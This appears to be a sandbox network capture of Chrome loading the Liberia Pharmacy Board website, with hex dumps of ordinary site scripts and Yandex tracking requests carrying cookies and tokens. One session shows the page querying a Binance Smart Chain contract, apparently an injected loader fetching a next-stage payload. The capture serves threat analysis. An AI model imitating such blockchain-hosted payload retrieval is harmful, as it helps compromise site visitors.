                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 6e 76 2e 77 69 64 74 68 2c 22 61 75 74 6f 22 3d 3d 3d 61 5b 65 5d 2e 73 6c 69 64 65 72 4c 61 79 6f 75 74 26 26 28 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 2e 6c 65 66 74 3d 61 5b 65 5d 2e 6f 75 74 4e 61 76 44 69 6d 73 2e 6c 65 66 74 29 2c 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 21 3d 3d 61 5b 65 5d 2e 65 6d 70 74 79 4f 62 6a 65 63 74 26 26 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 29 21 3d 3d 61 5b 65 5d 2e 63 61 63 68 65 73 2e 73 65 74 73 69 7a 65 43 4f 42 4a 26 26 28 61 5b 65 5d 2e 63 61 63 68 65 73 2e 73 65 74 73 69 7a 65 43 4f 42 4a 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 5b 65 5d 2e 64 72 61 77 55 70 64 61 74 65 73 2e 63 29 2c 6c 3d 21 30 2c 61 5b 65 5d 2e
                                                                                                                        Data Ascii: nv.width,"auto"===a[e].sliderLayout&&(a[e].drawUpdates.c.left=a[e].outNavDims.left),a[e].drawUpdates.c!==a[e].emptyObject&&JSON.stringify(a[e].drawUpdates.c)!==a[e].caches.setsizeCOBJ&&(a[e].caches.setsizeCOBJ=JSON.stringify(a[e].drawUpdates.c),l=!0,a[e].
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 3d 22 72 67 62 61 28 22 2b 70 61 72 73 65 49 6e 74 28 63 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 32 29 2c 31 36 29 2b 22 2c 20 22 2b 70 61 72 73 65 49 6e 74 28 63 2e 73 75 62 73 74 72 69 6e 67 28 32 2c 34 29 2c 31 36 29 2b 22 2c 20 22 2b 70 61 72 73 65 49 6e 74 28 63 2e 73 75 62 73 74 72 69 6e 67 28 34 2c 36 29 2c 31 36 29 2b 22 2c 20 22 29 3a 2d 31 21 3d 3d 72 2e 73 65 61 72 63 68 28 22 72 67 62 22 29 26 26 28 63 3d 72 2e 73 75 62 73 74 72 69 6e 67 28 72 2e 69 6e 64 65 78 4f 66 28 22 28 22 29 2b 31 2c 72 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 29 22 29 29 2e 73 70 6c 69 74 28 22 2c 22 29 29 2e 6c 65 6e 67 74 68 3e 32 26 26 28 63 3d 22 72 67 62 61 28 22 2b 63 5b 30 5d 2e 74 72 69 6d 28 29 2b 22 2c 20 22 2b 63 5b 31 5d 2e 74 72 69 6d 28 29 2b 22 2c 20 22
                                                                                                                        Data Ascii: ="rgba("+parseInt(c.substring(0,2),16)+", "+parseInt(c.substring(2,4),16)+", "+parseInt(c.substring(4,6),16)+", "):-1!==r.search("rgb")&&(c=r.substring(r.indexOf("(")+1,r.lastIndexOf(")")).split(",")).length>2&&(c="rgba("+c[0].trim()+", "+c[1].trim()+", "
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 6e 64 28 27 3c 61 20 63 6c 61 73 73 3d 22 72 73 2d 6c 61 79 65 72 20 73 6c 69 64 65 6c 69 6e 6b 22 20 69 64 3d 22 72 73 5f 73 6c 69 64 65 6c 69 6e 6b 5f 27 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 31 65 35 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 27 22 20 64 61 74 61 2d 7a 69 6e 64 65 78 3d 22 27 2b 28 22 62 61 63 6b 22 3d 3d 3d 53 3f 30 3a 22 66 72 6f 6e 74 22 3d 3d 3d 53 3f 39 35 3a 53 21 3d 3d 74 3f 70 61 72 73 65 49 6e 74 28 53 2c 30 29 3a 31 30 30 29 2b 27 22 20 64 61 74 61 78 79 3d 22 78 3a 63 3b 79 3a 63 22 20 64 61 74 61 2d 64 69 6d 3d 22 77 3a 31 30 30 25 3b 68 3a 31 30 30 25 22 20 64 61 74 61 2d 62 61 73 65 61 6c 69 67 6e 3d 22 73 6c 69 64 65 22 20 68 72 65 66 3d 22 27 2b 62 2b 27 22 20 74 61 72 67 65 74 3d 22 27 2b 28 61 2e 67 41 28 63 2c 22
                                                                                                                        Data Ascii: nd('<a class="rs-layer slidelink" id="rs_slidelink_'+Math.round(1e5*Math.random())+'" data-zindex="'+("back"===S?0:"front"===S?95:S!==t?parseInt(S,0):100)+'" dataxy="x:c;y:c" data-dim="w:100%;h:100%" data-basealign="slide" href="'+b+'" target="'+(a.gA(c,"
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 2c 43 5b 30 5d 2e 64 61 74 61 73 65 74 2e 73 74 61 74 69 63 7a 2c 61 5b 69 5d 2e 5f 4c 73 68 6f 72 74 63 75 74 73 5b 43 5b 30 5d 2e 69 64 5d 2e 70 29 7d 61 2e 67 41 28 43 5b 30 5d 2c 22 61 63 74 69 6f 6e 73 22 29 26 26 61 2e 63 68 65 63 6b 41 63 74 69 6f 6e 73 26 26 61 2e 63 68 65 63 6b 41 63 74 69 6f 6e 73 28 43 2c 69 2c 61 5b 69 5d 29 2c 21 61 2e 63 68 65 63 6b 56 69 64 65 6f 41 70 69 73 7c 7c 77 69 6e 64 6f 77 2e 72 73 5f 61 64 64 65 64 76 69 6d 26 26 77 69 6e 64 6f 77 2e 72 73 5f 61 64 64 65 64 79 74 7c 7c 61 5b 69 5d 2e 79 6f 75 74 75 62 65 61 70 69 6e 65 65 64 65 64 26 26 61 5b 69 5d 2e 76 69 6d 65 6f 61 70 69 6e 65 65 64 65 64 7c 7c 61 2e 63 68 65 63 6b 56 69 64 65 6f 41 70 69 73 28 43 2c 69 29 7d 61 2e 63 68 65 63 6b 41 63 74 69 6f 6e 73 26 26 61
                                                                                                                        Data Ascii: ,C[0].dataset.staticz,a[i]._Lshortcuts[C[0].id].p)}a.gA(C[0],"actions")&&a.checkActions&&a.checkActions(C,i,a[i]),!a.checkVideoApis||window.rs_addedvim&&window.rs_addedyt||a[i].youtubeapineeded&&a[i].vimeoapineeded||a.checkVideoApis(C,i)}a.checkActions&&a


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        83192.168.2.74989487.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC1509OUTGET /sync_cookie_image_decide?token=10611.fH1OoSXDiCxpBQsjNz70vRcfoRCKnV72el8MOyZYUCNzPInswMVnZDixWZGJbZzcYCAPwYpj7I7oMEJSzlmlYQitO10RILaai2SvrMOULwtXGJey34xqsHUZbXqM2IFP8_R0NmA-LVPKkiCHFbb3UOiiVBU70YuNH0QeJGVsn8wIEyFktKtOCKdV6q2ne-bgGW8rqnWWD7Oz0Wepdc5Mf7W_6AMFUHHic0BLUHtJKnI%2C.6n504nlTozvgH4AdcQ2ltdTO0ZU%2C HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
                                                                                                                        2025-01-10 13:54:52 UTC1288INHTTP/1.1 200 Ok
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Set-Cookie: yandexuid=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:52 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yuidss=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:52 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; Expires=Mon, 08-Jan-2035 13:54:52 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yp=1736603692.yu.4571074561736517291; Expires=Mon, 08-Jan-2035 13:54:52 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: ymex=1739109292.oyu.4571074561736517291#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; Expires=Sat, 10-Jan-2026 13:54:52 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: sync_cookie_ok=synced; Expires=Sat, 11-Jan-2025 13:54:52 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: _yasc=XBqUyvojMxdMRSjXD7EJ7s9HfIFH6CKB65IUm/heM4Xd45wZMJIPs8Nrazup/NI3KNQK; domain=.yandex.com; path=/; expires=Mon, 08 Jan 2035 13:54:52 GMT; secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:52 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        84192.168.2.74989735.71.137.1054432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC604OUTPOST / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 173
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Content-Type: application/json
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:52 UTC173OUTData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 31 66 36 61 30 30 62 61 2d 38 61 32 37 2d 34 36 32 61 2d 38 39 63 63 2d 36 33 37 37 61 34 64 62 36 37 31 65 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 39 31 37 39 64 64 61 38 42 32 38 35 30 34 30 42 66 33 38 31 41 41 42 62 38 61 31 66 34 61 31 62 38 63 33 37 45 64 35 33 22 2c 22 64 61 74 61 22 3a 22 30 78 35 39 32 31 31 66 38 66 22 7d 2c 22 6c 61 74 65 73 74 22 5d 7d
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"1f6a00ba-8a27-462a-89cc-6377a4db671e","method":"eth_call","params":[{"to":"0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53","data":"0x59211f8f"},"latest"]}
                                                                                                                        2025-01-10 13:54:52 UTC601INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Content-Length: 331
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: d432a7a5da8d8a8b030d14d75e485178
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:52 UTC331INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 31 66 36 61 30 30 62 61 2d 38 61 32 37 2d 34 36 32 61 2d 38 39 63 63 2d 36 33 37 37 61 34 64 62 36 37 31 65 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 61 33 30 37 38 33 38 34 36 34 32 34 31 33 31 33 36 33 36 33 37 34 32 34 35 34 36 33 35 34 35 36 34 34 31 33 34 33 33 33 33 33 39 33 32 33 38 36 32 33 32 33 32 33 30
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"1f6a00ba-8a27-462a-89cc-6377a4db671e","result":"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002a307838464241313636374245463545644134333339323862323230


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        85192.168.2.74989852.223.34.1554432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC348OUTGET / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:52 UTC563INHTTP/1.1 404 Not Found
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Content-Type: text/plain
                                                                                                                        Content-Length: 18
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: a84637adf8bd97b542bba9399a757b54
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:52 UTC18INData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                        Data Ascii: 404 page not found


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        86192.168.2.74990169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC486OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:52 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Tue, 02 Apr 2024 20:43:58 GMT
                                                                                                                        ETag: "4926-615232a577cfe"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 18726
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:52 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:52 UTC7823INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                        Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                        2025-01-10 13:54:52 UTC8000INData Raw: 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66
                                                                                                                        Data Ascii: ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\udef1\ud83c\udffe\u200d\ud83e\udef2\ud83c[\udffb-\udffd\udfff]|\ud83e\udef1\ud83c\udfff\u200d\ud83e\udef2\ud83c[\udf
                                                                                                                        2025-01-10 13:54:52 UTC2903INData Raw: 7d 7d 28 29 3b 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 29 7b 63 2e 77 70 3d 63 2e 77 70 7c 7c 7b 7d 2c 63 2e 77 70 2e 65 6d 6f 6a 69 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 75 2c 65 3d 63 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 63 2e 57 65 62 4b 69 74 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 63 2e 4d 6f 7a 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 61 3d 63 2e 64 6f 63 75 6d 65 6e 74 2c 74 3d 21 31 2c 72 3d 30 2c 6f 3d 30 3c 63 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 54 72 69 64 65 6e 74 2f 37 2e 30 22 29 3b 66 75 6e
                                                                                                                        Data Ascii: }}();// Source: wp-includes/js/wp-emoji.min.js!function(c,l){c.wp=c.wp||{},c.wp.emoji=new function(){var n,u,e=c.MutationObserver||c.WebKitMutationObserver||c.MozMutationObserver,a=c.document,t=!1,r=0,o=0<c.navigator.userAgent.indexOf("Trident/7.0");fun


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        87192.168.2.74989987.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC1236OUTGET /sync_cookie_image_check_secondary HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
                                                                                                                        2025-01-10 13:54:52 UTC547INHTTP/1.1 302 Moved temporarily
                                                                                                                        Connection: Close
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Location: https://mc.yandex.ru/sync_cookie_image_start_secondary?redirect_domain=mc.yandex.com&token=10611.-yuCCBaYK4CRWSzmL9Jm4JCDqIWwZAny2ROmgX36wKGxzWyajnj8lBQ8tt0qLI52.ww_YVhfLx-sE7lYJHl7m8Ok-Tds%2C
                                                                                                                        Set-Cookie: sync_cookie_csrf_secondary=867164232fake; Expires=Fri, 10-Jan-2025 14:04:52 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        88192.168.2.74990077.88.21.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC1974OUTGET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29ti%2 [TRUNCATED]
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
